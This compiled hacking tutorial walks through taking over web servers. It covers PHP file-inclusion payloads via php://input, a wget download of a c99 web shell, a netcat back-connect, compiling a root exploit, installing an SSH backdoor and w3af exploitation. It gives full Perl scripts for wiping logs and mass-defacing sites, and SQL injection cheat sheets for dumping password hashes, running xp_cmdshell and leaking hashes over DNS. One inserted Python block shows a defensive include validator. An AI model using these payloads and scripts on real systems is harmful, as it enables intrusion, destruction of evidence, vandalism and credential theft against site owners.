with certain commands, and hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers".
I'll show you how to exploit via php://input using the "Hackbar".
So let's check what we're supposed to use in the Hackbar:
Now let's try putting this method into action.
Look at the picture carefully.
The URL will be:
Code:
http://www.site.com/index.php?page=php://input
and the POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now, shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell:
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php'); ?>
This is how it's going to look:
Now that you've spawned a shell, you can navigate to your shell on the site.
Code:
http://www.site.com/shell.php
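Every step above depends on the application passing the raw "page" value to include(). The following is an added example (not from the original post) of the hardened counterpart: the parameter is mapped onto a fixed set of template names, and the absolute paths, /proc/self/* files, php://input wrapper and null bytes used in this tutorial are all refused; TEMPLATE_ROOT and ALLOWED_PAGES are assumed values.

```python
"""Constructed example (not from the original post): the hardened counterpart of
the include($_GET['page']) pattern that the php://input tutorial abuses. The
"page" value is mapped onto a fixed set of template files, and the inputs used
above (absolute paths, /proc/self/environ, php://input, null bytes) are refused.
TEMPLATE_ROOT and ALLOWED_PAGES are assumed values."""
import posixpath
import re
from typing import Optional

TEMPLATE_ROOT = "/var/www/app/pages"          # assumed: directory holding page templates
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed: the only includable page names
WRAPPER = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # php://, data://, http://...
SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,32}$", re.IGNORECASE)


def classify_page_param(value: str) -> str:
    """Return the reason a value is refused, or 'ok' for a bare page name."""
    if "\x00" in value or "%00" in value.lower():
        return "null byte"
    if WRAPPER.match(value):
        return "stream wrapper"
    if value.startswith(("/", "\\")) or ":" in value:
        return "absolute path"
    if ".." in value or "/" in value or "\\" in value:
        return "path traversal"
    if not SAFE_NAME.match(value):
        return "bad characters"
    return "ok"


def resolve_page(value: str) -> Optional[str]:
    """Return the template path the application may include, or None to refuse."""
    if classify_page_param(value) != "ok":
        return None
    name = value.lower()
    if name not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, name + ".php"))
    # Defense in depth: the resolved path must still sit under TEMPLATE_ROOT.
    if posixpath.commonpath([TEMPLATE_ROOT, path]) != TEMPLATE_ROOT:
        return None
    return path


if __name__ == "__main__":
    for probe in ("home", "/etc/passwd", "/proc/self/environ", "php://input",
                  "../../etc/passwd", "home%00", "admin"):
        print(f"{probe!r}: {classify_page_param(probe)} -> {resolve_page(probe)}")
```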
You can watch the video tutorial below so that it'll be easier to understand.
Have fun.
Server Rooting Via Shell and Mass defacement script
Now let's kill the root:
Getting Backconnectionto the server
Copythe Netcat directorytoC:
Opencommandprompt,type:cd C:NETCAT
It'll looklike this:
MicrosoftWindows[Version6.1.7600]
Copyright(c) 2009 MicrosoftCorporation.All rightsreserved.
C:Userskislay>cdc:netcat
c:netcat>
NowType:nc -l -v -p2121
It'll looklike-
c:netcat>nc-l -v-p 2121
listeningon[any] 2121 ...
OpenyourShell inyourbrowser,goto the backconnectiontab,if itis notthere geta
shell like "B374k"or Anyother
thats yourchoice.
Specifyyourip& port as 2121. pressconnect,now you'll geta shell tothe server,you
can give commandsto the serverthroughthatshell.
Getting the right exploit for the server
Type: uname -a & hit enter.
It'll look something like this:
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
It shows the kernel version of the server is: 2.6.18-194.26.1.el5
& year is 2010.
You need to find a perfect exploit for it. You can find them at:
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# r00tw0rm.com
Compiling & executing exploit
Now I've got an exploit, & it is written in C. So I can't execute it by just uploading, but I need to compile it.
Before proceeding further, cd into the tmp directory, coz it is always writable. So type:
cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
So first I'll get the exploit on the server, so I type: wget http://exploitsite.net/exploits/my_exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something like this:
[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]
Now change the permission of the exploit to 777.
Type: chmod 777 my_exploit.c
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c
Now the exploit is on my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as exploit
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c
Next step is to execute it, so we'll type: ./exploit
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c
Now it says got root. Let's check if it is true,
Type: id
It may look like: uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
Which means I got root :)
Installing Backdoor
Type: wget urlofbackdoor.com/sshdoor.zip
Then type: unzip sshdoor.zip
Then type: ./run pass port
^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges. ;)
Methods to execute exploits written in other languages
# C exploit
gcc -o exploit exploit.c
chmod +x exploit
./exploit
# Perl
perl exploit.pl
# Python
python exploit.py
# PHP
php exploit.php
# zip
unzip exploit.zip
./run
Cleaning Logs
# You can use my log cleaner to clear your track :D. It is written in Perl. Save it as anything.pl & to execute type: perl anything.pl
Here is the code:
[perl]
#!/usr/bin/perl -w
# Warnings enabled!
# Log cleaner version Public
# Give Credits Where Needed - Kouros!
# This took time, Hope you fucking use it :D
# Report bugs to info@Kouros-bl4ckhat.com
# NOTE - YOU MUST BE ROOT!
print qq^
####################################
#      Log Cleaner 3.0 PUBLIC      #
#             Kouros               #
#                                  #
#      Virangar Security Team      #
#   http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
    print "Enter Which OS: ";          # User Input
    chomp($os = <STDIN>);              # Takes it into memory
    if($os eq "help"){
        print "[+] Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
        print "[+] Hit enter with OS, Let the script do its work\n";
        print "[+] Note: You MUST Be Root!\n";
        print "[+] Contact Info[at]Kouros-bl4ckhat[dot]Com";
        print "[+] For Bug finds... Have Fun!\n";
        print "[+] - Kouros";
    }
    if($os eq "linux"){                # If linux typed, do the following and start brackets
        foreach my $logphile(@linux){
            unlink($logphile) || print "[-] Fucked up: \"$logphile\": $!\n";
        }
    } elsif($os eq "sunos"){           # If sunos typed, do the following and start brackets
        foreach my $logphile(@sunos){
            unlink($logphile) || print "[-] Fucked up: \"$logphile\": $!\n";
        }
    } elsif($os eq "aix"){             # If aix typed, do the following and start brackets
        foreach my $logphile(@aix){
            unlink($logphile) || print "[-] Fucked up: \"$logphile\": $!\n";
        }
    } elsif($os eq "irix"){            # If irix typed, do the following and start brackets
        foreach my $logphile(@irix){
            unlink($logphile) || print "[-] Fucked up: \"$logphile\": $!\n";
        }
    } else { print "Umm WTF !?\n"; }
    # Logs of Irix Systems
    { # Start Irix Bracket
        @irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
                 "/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
                 "/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
                 "/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
                 "/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
                 "/var/adm/crash/unix"); # End Array
    } # End Irix Bracket
    # Logs of Aix Systems
    { # Start Aix Bracket
        @aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
                "/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
                "/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
                "/etc/security/failedlogin", "usr/spool/mqueue/syslog"); # End Array
    } # End Aix Bracket
    # Logs of SunOS Systems
    { # Start SunOS Bracket
        @sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
                  "/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
                  "/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
                  "/var/adm/log/asppp.log", "/var/log/syslog",
                  "/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
                  "/var/lp/logs/lpsched", "/var/lp/logs/requests",
                  "/var/cron/logs", "/var/saf/_log", "/var/saf/port/log"); # End Array
    } # End SunOS Bracket
    # Logs of Linux Systems
    { # Start Linux Bracket
        @linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
                  "/var/log/secure", "/root/.ksh_history", "/root/.bash_history",
                  "/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
                  "/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
                  "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
                  "/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
                  "/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
                  "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
                  "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
                  "/var/log/httpsd/ssl.access_log", "/etc/mail/access",
                  "/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
                  "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
                  "/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
                  "/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
                  "/var/log/news/news.crit", "/var/log/news/news.err",
                  "/var/log/news/news.notice",
                  "/var/log/news/suck.err", "/var/log/news/suck.notice",
                  "/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
                  "/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
                  "/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
                  "/var/log/auth"); # End Array
    } # End Linux Bracket
} # Ends Loop
[/perl]
Mass deface
I've a Perl script to mass deface sites on the server. Execute it the same way as above.
[perl]
#!/usr/bin/perl
# MSRml V 0.1
#
# MOROCCO.SECURITY.RULZ mass defacer and log eraser
#
# coded by PRI[ll
#
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!
#
# 05/07/2005
#
# usage   : perl MSRml.pl <path to index>
#
# example : perl MSRml.pl /tmp/index.html
#
# the_r00t3r@hotmail.com
use strict;

# ANSI colour sequences used in the banners
my $BLUE  = "\033[01;34m";
my $WHITE = "\033[01;37m";
my $RED   = "\033[01;31m";

my $index = $ARGV[0];
if ($ARGV[0])
{
    if ( -e $index )
    {
        system "echo -e \"${BLUE}Started MSRml V0.1 by PRI[ll Ok!!${WHITE}\"\n";
        system "echo -e \"${WHITE}Defacing all homepages...\"\n";
        system "find / -name \"index*\" -exec cp $index {} \\;";
        system "find / -name \"main*\" -exec cp $index {} \\;";
        system "find / -name \"home*\" -exec cp $index {} \\;";
        system "find / -name \"default*\" -exec cp $index {} \\;";
        system "echo -e \"${WHITE}[+] done ! all sites in this box are defaced!\"\n";
        system "echo -e \"${WHITE}----------------------------------------------------------\"\n";
        system "echo -e \"${WHITE}Cleaning up logs...\"\n";
        system "echo -e \"${BLUE}---------erasing default log files (too fast =))---------${WHITE}\"\n";
        # The original spells out one if/else block per path; the same
        # paths are handled here in a single loop with identical behaviour.
        foreach my $log ("/var/log/lastlog", "/var/log/wtmp", "/etc/wtmp", "/var/run/utmp",
                         "/etc/utmp", "/var/log", "/var/logs", "/var/adm",
                         "/var/apache/log", "/var/apache/logs",
                         "/usr/local/apache/log", "/usr/local/apache/logs",
                         "/root/.bash_history", "/root/.ksh_history")
        {
            if ( -e $log )
            {
                system "rm -rf $log";
                system "echo -e \"${WHITE} [*] $log - erased Ok\"\n";
            }
            else
            {
                system "echo -e \"${RED}[*] $log - No such file or directory${WHITE}\"\n";
            }
        }
        system "echo -e \"${WHITE}[+] ----- done all default log and bash_history files erased!!\"\n";
        system "echo -e \"${BLUE}---------Now Erasing the rest of the machine log files (can be long :S)---------${WHITE}\"\n";
        system 'find / -name *.bash_history -exec rm -rf {} \;';
        system "echo -e \"${WHITE}[*] all *.bash_history files - erased Ok!\"\n";
        system 'find / -name *.bash_logout -exec rm -rf {} \;';
        system "echo -e \"${WHITE}[*] all *.bash_logout files - erased Ok!\"\n";
        system 'find / -name "log*" -exec rm -rf {} \;';
        system "echo -e \"${WHITE}[*] all log* files - erased Ok!\"\n";
        system 'find / -name *.log -exec rm -rf {} \;';
        system "echo -e \"${WHITE}[*] all *.log files - erased Ok!\"\n";
        system "echo -e \"${BLUE}-------[+] !done all log files erased![+]-------${WHITE}\"\n";
        system "echo -e \"${BLUE}---------------------------------------------------${WHITE}\"\n";
        system "echo -e \"${BLUE}-----------------MSRml V 0.1----------------------${WHITE}\"\n";
    }
    else
    {
        system "echo -e \"${RED}[-] Failed! the path to u're index could not be found !${WHITE}\"\n";
        exit;
    }
}
else
{
    system "echo -e \"${WHITE}!!Morocco.Security.Rulz mass defacer and log eraser!!\"\n";
    system "echo -e \"${WHITE}!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!\"\n";
    system "echo -e \"${RED}!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!${WHITE}\"\n";
    system "echo -e \"${WHITE}usage : perl $0 <path to u're index>\"\n";
    system "echo -e \"${WHITE}example : perl $0 /tmp/index.html\"\n";
    exit;
}
[/perl]
Getting Shell of a website by w3af
Hello everyone, you all know about Metasploit and use it to exploit the targets. Good good... but do you know about w3af (Web Application Attack and Audit Framework) by Rapid7? Yes, it is also developed by Rapid7, which is a famous security firm and developed Metasploit. It is not bigger than Metasploit, but it is more powerful than the other web testing tools. OK, now the introduction is over. We proceed to the practical.
Requisites: Python and w3af
Step 1: Open the console and type:
target
set target www.site.com
Step 2: Now type:
plugins
Step 3: Now we'll look for available plugins to enable them by typing:
help
Step 5: Now we'll choose the plugin from category "audit". Type:
audit "name of plugin" (as mentioned in the picture)
You can choose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3> .....
Step 6: If you saw any plugin with config option marked as "YES", then to configure it type:
audit config <plugin>
Step 7: Now type:
back
Step 8: Choose another category (if you want):
evasion or bruteforce or any one
Step 9: Now we are ready with our values; to start the scanning type:
start scan
Step 10: After finishing the scan, we'll have to exploit the target. So type:
exploit
Step 11: Again type:
exploit osCommandingShell
Step 12: If everything goes right, we'll get the shell of the server; type:
interact 0 (zero)
Part - 3
 SQL Injection Cheat Sheet
 Oracle SQL Injection Cheat Sheet
 MSSQL Injection Cheat Sheet
 MySQL SQL Injection Cheat Sheet
 Postgres SQL Injection Cheat Sheet
 Ingres SQL Injection Cheat Sheet
 DB2 SQL Injection Cheat Sheet
 Informix SQL Injection Cheat Sheet
 WordPress Hacking Tricks
 DNS Zone Transfer Vulnerability Exploit
 WHMCS Hacking with Submit Ticket exploit
 WHMCS Auto Exploiter
 Oracle Padding Attack Using Burp Suite
 HTTP NTLM INFORMATION DISCLOSURE
SQL Injection Cheat Sheet
Oracle SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Oracle databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply, and also areas that I haven’t got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I’m working on is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with
“-- priv” at the end of the query.
Version
  SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
  SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
  SELECT version FROM v$instance;
Comments
  SELECT 1 FROM dual -- comment
  -- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.
Current User
  SELECT user FROM dual
List Users
  SELECT username FROM all_users ORDER BY username;
  SELECT name FROM sys.user$; -- priv
List Password Hashes
  SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
  SELECT name, spare4 FROM sys.user$ -- priv, 11g
Password Cracker
  checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
  SELECT * FROM session_privs; -- current privs
  SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
  SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts
  SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles
Current Database
  SELECT global_name FROM global_name;
  SELECT name FROM v$database;
  SELECT instance_name FROM v$instance;
  SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases
  SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
  -- Also query the TNS listener for other databases. See tnscmd (services | status).
List Columns
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';
List Tables
  SELECT table_name FROM all_tables;
  SELECT owner, table_name FROM all_tables;
Find Tables From Column Name
  SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case
Select Nth Row
  SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r = 9; -- gets 9th row (rows numbered from 1)
Select Nth Char
  SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'
Bitwise AND
  SELECT bitand(6, 2) FROM dual; -- returns 2
  SELECT bitand(6, 1) FROM dual; -- returns 0
ASCII Value -> Char
  SELECT chr(65) FROM dual; -- returns A
Char -> ASCII Value
  SELECT ascii('A') FROM dual; -- returns 65
Casting
  SELECT CAST(1 AS char) FROM dual;
  SELECT CAST('1' AS int) FROM dual;
String Concatenation
  SELECT 'A' || 'B' FROM dual; -- returns AB
If Statement
  BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements
Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
  SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
Avoiding Quotes
  SELECT chr(65) || chr(66) FROM dual; -- returns AB
Time Delay
  BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
  SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered/slow
  -- Also see Heavy Queries to create a time delay
Make DNS Requests
  SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Command Execution
  Java can be used to execute commands if it's installed. ExtProc can sometimes be used too, though it normally failed for me.
Local File Access
  UTL_FILE can sometimes be used. Check that the following is non-null:
  SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
  Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address
  SELECT UTL_INADDR.get_host_name FROM dual;
  SELECT host_name FROM v$instance;
  SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
Location of DB files
  SELECT name FROM V$DATAFILE;
Default/System Databases
  SYSTEM
  SYSAUX
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:
Get all table names in one string
  select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()'), ',') from all_tables -- when using union based SQLi with only one row
Blind SQLi in order by clause
  order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1) = 1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype
MSSQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MSSQL databases…
Version
  SELECT @@version
Comments
  SELECT 1 -- comment
  SELECT /*comment*/ 1
Current User
  SELECT user_name();
  SELECT system_user;
  SELECT user;
  SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users
  SELECT name FROM master..syslogins
List Password Hashes
  SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
  SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
  SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
  SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
Password Cracker
  MSSQL 2000 and 2005 hashes are both SHA1-based. phrasen|drescher can crack these.
List Privileges
  -- current privs on a particular object in 2005, 2008
  SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
  SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
  SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
  SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
  -- current privs in 2005, 2008
  SELECT is_srvrolemember('sysadmin');
  SELECT is_srvrolemember('dbcreator');
  SELECT is_srvrolemember('bulkadmin');
  SELECT is_srvrolemember('diskadmin');
  SELECT is_srvrolemember('processadmin');
  SELECT is_srvrolemember('serveradmin');
  SELECT is_srvrolemember('setupadmin');
  SELECT is_srvrolemember('securityadmin');
  -- who has a particular priv? 2005, 2008
  SELECT name FROM master..syslogins WHERE denylogin = 0;
  SELECT name FROM master..syslogins WHERE hasaccess = 1;
  SELECT name FROM master..syslogins WHERE isntname = 0;
  SELECT name FROM master..syslogins WHERE isntgroup = 0;
  SELECT name FROM master..syslogins WHERE sysadmin = 1;
  SELECT name FROM master..syslogins WHERE securityadmin = 1;
  SELECT name FROM master..syslogins WHERE serveradmin = 1;
  SELECT name FROM master..syslogins WHERE setupadmin = 1;
  SELECT name FROM master..syslogins WHERE processadmin = 1;
  SELECT name FROM master..syslogins WHERE diskadmin = 1;
  SELECT name FROM master..syslogins WHERE dbcreator = 1;
  SELECT name FROM master..syslogins WHERE bulkadmin = 1;
List DBA Accounts
  SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation
  SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for invalid role/username.
  SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005
Current Database
  SELECT DB_NAME()
List Databases
  SELECT name FROM master..sysdatabases;
  SELECT DB_NAME(N); -- for N = 0, 1, 2, …
List Columns
  SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id = master..sysobjects.id AND master..sysobjects.name = 'sometable'; -- list column names and types for master..sometable
List Tables
  SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
  SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id = master..sysobjects.id AND master..sysobjects.name = 'sometable'; -- list column names and types for master..sometable
Find Tables From Column Name
  -- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
  SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth Row
  SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth Char
  SELECT substring('abcd', 3, 1) -- returns c
Bitwise AND
  SELECT 6 & 2 -- returns 2
  SELECT 6 & 1 -- returns 0
ASCII Value -> Char
  SELECT char(0x41) -- returns A
Char -> ASCII Value
  SELECT ascii('A') -- returns 65
Casting
  SELECT CAST('1' as int);
  SELECT CAST(1 as char)
String Concatenation
  SELECT 'A' + 'B' -- returns AB
If Statement
  IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding Quotes
  SELECT char(65)+char(66) -- returns AB
Time Delay
  WAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requests
  declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
  declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
  -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
  -- Also check out the DNS tunnel feature of sqlninja
Command Execution
  EXEC xp_cmdshell 'net user'; -- priv
  On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
  EXEC sp_configure 'show advanced options', 1; -- priv
  RECONFIGURE; -- priv
  EXEC sp_configure 'xp_cmdshell', 1; -- priv
  RECONFIGURE; -- priv
Local File Access
  CREATE TABLE mydata (line varchar(8000));
  BULK INSERT mydata FROM 'c:\boot.ini';
  DROP TABLE mydata;
Hostname, IP Address
  SELECT HOST_NAME()
Create Users
  EXEC sp_addlogin 'user', 'pass'; -- priv
Drop Users
  EXEC sp_droplogin 'user'; -- priv
Make User DBA
  EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv
Location of DB files
  EXEC sp_helpdb master; -- location of master.mdf
  EXEC sp_helpdb pubs; -- location of pubs.mdf
Default/System Databases
  northwind
  model
  msdb
  pubs -- not on sql server 2005
  tempdb
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Dan Crowley:
A way to extract data via SQLi with a MySQL backend
From Jeremy Bae:
Tip about sp_helpdb – included in table above.
From Trip:
List DBAs (included in table above now):
  select name from master..syslogins where sysadmin = '1'
From Daniele Costa:
Tips on using fn_my_permissions in 2005, 2008 – included in table above.
Also:
To check permissions on multiple databases you will have to use the following pattern.
  USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, 'DATABASE')
Note also that in case of using this data with a UNION query a collation error could occur.
In this case a simple trick is to use the following syntax:
  select permission_name collate database_default FROM fn_my_permissions (NULL, 'DATABASE')
MySQL SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MySQL databases…
Version
  SELECT @@version
Comments
  SELECT 1; #comment
  SELECT /*comment*/ 1;
Current User
  SELECT user();
  SELECT system_user();
List Users
  SELECT user FROM mysql.user; -- priv
List Password Hashes
  SELECT host, user, password FROM mysql.user; -- priv
Password Cracker
  John the Ripper will crack MySQL password hashes.
List Privileges
  SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
  SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
  SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
  SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
List DBA Accounts
  SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
  SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database
  SELECT database()
List Databases
  SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
  SELECT distinct(db) FROM mysql.db -- priv
List Columns
  SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List Tables
  SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name
  SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'
Select Nth Row
